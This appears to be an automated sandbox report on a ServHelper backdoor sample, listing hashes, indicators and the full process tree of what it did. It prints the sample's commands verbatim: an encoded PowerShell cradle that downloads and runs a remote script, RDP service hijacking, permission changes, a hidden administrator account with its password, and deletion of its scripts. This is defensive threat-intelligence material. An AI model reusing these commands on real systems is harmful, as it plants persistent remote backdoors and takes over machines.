Analysis
-
max time kernel
134s -
max time network
52s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
27-04-2021 14:25
Static task
static1
Behavioral task
behavioral1
Sample
clr.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
clr.exe
Resource
win10v20210410
General
-
Target
clr.exe
-
Size
6.0MB
-
MD5
1e9f45329ffece31382bb884367f58df
-
SHA1
52d3d55364d8c4d350231d38bfe6eb156cf8473f
-
SHA256
8779c8ac97c45254bc243e2ee79b436d1a96bc56885dcaa72c4837790b2071fc
-
SHA512
12272d5f20c42764992420aa1a178b16d7ef1873f2c9619bd8ac16e0eb9a0067a08a9d70863c1d3e95dd4a2aa19c081ae0baabaf3431f5068ea7191c8f4d6c62
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 932 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1628 icacls.exe 1588 icacls.exe 1624 takeown.exe 1152 icacls.exe 268 icacls.exe 1264 icacls.exe 296 icacls.exe 1040 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 300 300 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1040 icacls.exe 1628 icacls.exe 1588 icacls.exe 1624 takeown.exe 1152 icacls.exe 268 icacls.exe 1264 icacls.exe 296 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca26ce03-4de2-4bc1-8592-b97e82a1b803 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_614e1354-df19-41a8-841a-159c03ec17ce powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b537a550-c03b-49d7-a9ae-721f6beca2f1 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1d5c7ce6-e716-47ce-95ed-cb59cb3f0821 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_083e8a6e-6e8b-466d-b93a-6d1054221df6 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_284ccdd5-293d-4845-9edd-e705a6ae537d powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e6ea3128-c9c5-42e6-b53d-2c90e0306cfb powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3595102e-e1b4-4c06-9b22-a2d3665df0e8 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ZYFJDCOX1KIQ17RN6M2.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_44a12f06-fd90-4c2f-a951-4680a701bc9c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5b49ac2d-d3df-434c-befa-254fa9af25f2 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97669659-8e51-4c66-84bc-505abdca3864 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exepowershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50343fd1713bd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1716 powershell.exe 1716 powershell.exe 568 powershell.exe 568 powershell.exe 1104 powershell.exe 1104 powershell.exe 1168 powershell.exe 1168 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 932 powershell.exe 932 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 460 300 300 300 300 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeRestorePrivilege 268 icacls.exe Token: SeAssignPrimaryTokenPrivilege 360 WMIC.exe Token: SeIncreaseQuotaPrivilege 360 WMIC.exe Token: SeAuditPrivilege 360 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 360 WMIC.exe Token: SeIncreaseQuotaPrivilege 360 WMIC.exe Token: SeAuditPrivilege 360 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 940 WMIC.exe Token: SeIncreaseQuotaPrivilege 940 WMIC.exe Token: SeAuditPrivilege 940 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 940 WMIC.exe Token: SeIncreaseQuotaPrivilege 940 WMIC.exe Token: SeAuditPrivilege 940 WMIC.exe Token: SeDebugPrivilege 932 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
clr.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1996 wrote to memory of 1716 1996 clr.exe powershell.exe PID 1996 wrote to memory of 1716 1996 clr.exe powershell.exe PID 1996 wrote to memory of 1716 1996 clr.exe powershell.exe PID 1716 wrote to memory of 1944 1716 powershell.exe csc.exe PID 1716 wrote to memory of 1944 1716 powershell.exe csc.exe PID 1716 wrote to memory of 1944 1716 powershell.exe csc.exe PID 1944 wrote to memory of 844 1944 csc.exe cvtres.exe PID 1944 wrote to memory of 844 1944 csc.exe cvtres.exe PID 1944 wrote to memory of 844 1944 csc.exe cvtres.exe PID 1716 wrote to memory of 568 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 568 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 568 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1104 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1104 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1104 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1168 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1168 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1168 1716 powershell.exe powershell.exe PID 1716 wrote to memory of 1624 1716 powershell.exe takeown.exe PID 1716 wrote to memory of 1624 1716 powershell.exe takeown.exe PID 1716 wrote to memory of 1624 1716 powershell.exe takeown.exe PID 1716 wrote to memory of 1152 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1152 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1152 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 268 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 268 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 268 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1264 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1264 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1264 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 296 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 296 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 296 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1040 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1040 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1040 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1628 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1628 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1628 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1588 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1588 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1588 1716 powershell.exe icacls.exe PID 1716 wrote to memory of 1056 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1056 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1056 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1704 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1704 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1704 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1664 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1664 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1664 1716 powershell.exe reg.exe PID 1716 wrote to memory of 1880 1716 powershell.exe net.exe PID 1716 wrote to memory of 1880 1716 powershell.exe net.exe PID 1716 wrote to memory of 1880 1716 powershell.exe net.exe PID 1880 wrote to memory of 1384 1880 net.exe net1.exe PID 1880 wrote to memory of 1384 1880 net.exe net1.exe PID 1880 wrote to memory of 1384 1880 net.exe net1.exe PID 1716 wrote to memory of 816 1716 powershell.exe cmd.exe PID 1716 wrote to memory of 816 1716 powershell.exe cmd.exe PID 1716 wrote to memory of 816 1716 powershell.exe cmd.exe PID 816 wrote to memory of 1336 816 cmd.exe cmd.exe PID 816 wrote to memory of 1336 816 cmd.exe cmd.exe PID 816 wrote to memory of 1336 816 cmd.exe cmd.exe PID 1336 wrote to memory of 1668 1336 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\clr.exe"C:\Users\Admin\AppData\Local\Temp\clr.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dj2uzjl3\dj2uzjl3.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B2C.tmp" "c:\Users\Admin\AppData\Local\Temp\dj2uzjl3\CSC13CA4630FD7E46319A767537DECD84BF.TMP"4⤵PID:844
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1624
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1152
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1264
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:296
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1040
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1628
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1588
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1056
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1704
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1664
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1384
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:960
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1168
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1052
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:992
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:964
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1140
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1016
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 5M9u06hR /add1⤵PID:1632
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 5M9u06hR /add2⤵PID:1704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 5M9u06hR /add3⤵PID:1708
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2040
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:972
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:1624
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:968
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1620
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:592
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 5M9u06hR1⤵PID:1632
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 5M9u06hR2⤵PID:1912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 5M9u06hR3⤵PID:816
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:964
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:360
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1708
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:984
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_25f301be-b2c6-4f25-ad6c-fc70afc0d642
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_44690195-8023-4b49-a166-fbc4d2d2cafc
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ff27bac-9f38-4729-83ee-0ebcc971626d
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_801b9513-4a94-44fe-918d-608a27661926
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_88d08a2f-a1d0-40c1-ad67-a819ece976a3
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b5893cf2-896f-49ec-8b40-c972772db15c
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef6c31f0-3f28-4101-a0b2-55a544aa7961
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD53e0cb92aae53070feeed08bfed2d9dec
SHA1ed6f922108a9ad92657b1f5ed7bcf75db54798ca
SHA256f1304402c3bc8d7304806e2f6ef4a0d8bd57f5f8183f6ec3c365187db6319ba0
SHA5120de8b5db4f41f5e62168b9bd7d6a366119d87f78b87856da98f8930340b54de3e20df1dd5a9088f51d97ade7ca1e1de245d470f057c677fbd73b1584e7339985
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5e060a46725d7e2a5dfbc72325b8af309
SHA1d622c60b1403dee8753757d360a43a578fcc34b6
SHA25685b86f8fe324ef0bd336384151e57127f0bc2cfe5dfd2c8dc3899f0a8cf12478
SHA5127fc51f4349917c8e7a448698783649fd302f88e29d68fdb356346691074eaacd5121f44f24439d21128f0a4dec19a188dafdc5d99a4a777c72144fdc540323f7
-
MD5
57c548b15fb26ecf9053a5adc58db9f2
SHA1c9f15dbef109de66634ddd66d205aa8a13d90428
SHA25684a3d6308c04697e1b736ba62d3f9cc8b94c0183714f67cf027c6681dfad47bb
SHA512eb99e2574128f8f6c1e6cafff310c379c8e0a8968293038bebe68ec1864b83f01bc9b72314699ea9ecf49054103ca05d6de80201519047424a1f0b865365f10a
-
MD5
f1192e0c3b2b0fc52274bbe58943a6cd
SHA1049a0737ec763cdab62b4ae7500939711f04be91
SHA25640d2bfa0f18f763c90d19291c01e4e01f3270add2d1f84481be8714209844898
SHA51283ded346c59adccebdf7904912c6428cce666d97c0f9c05c65d02cb38f319d9b61e60bd53cfaa5b579b81c9eb36028c0c881ef109d5866873c0d16f2fdeb2580
-
MD5
79ef440538d155354113fda08ce0186d
SHA198fdb4c28d13d3434c40065fff660183b56b808d
SHA256bc935c512f978490d78a7a26e4cbbce0fda2b8bc65a365e0b713620ed1649703
SHA51251c7a849d203968a94b609fcaa423202bf9574e11cb5e684090b83ac730b966f9ddf2c804c87edff1f1d40bfb2a0b070d144e5a627c2cac62301b592d9d15b3b
-
MD5
37330f50cf392bca59567a22de3b836a
SHA1f7b37328533a133567aa28f03015da69e2e36547
SHA256a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
SHA5125d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5cef4258b83cf1399ed5a1e487c37329c
SHA15e0cc21e3c018018b4abcf5c2361946488d44959
SHA256ea607435b33227b7fff7ff90dcd66a72c3fa42e969dc1b37b9657e55205cde80
SHA512aef4f0283fecab1d766f004f70b26920e2f7c61c0c7a0dd18d8809f0ad2d8a01ba8b834479ccaaafcf15f44d835947330c48ae53df0d4c91578270e2c584fbde
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5cef4258b83cf1399ed5a1e487c37329c
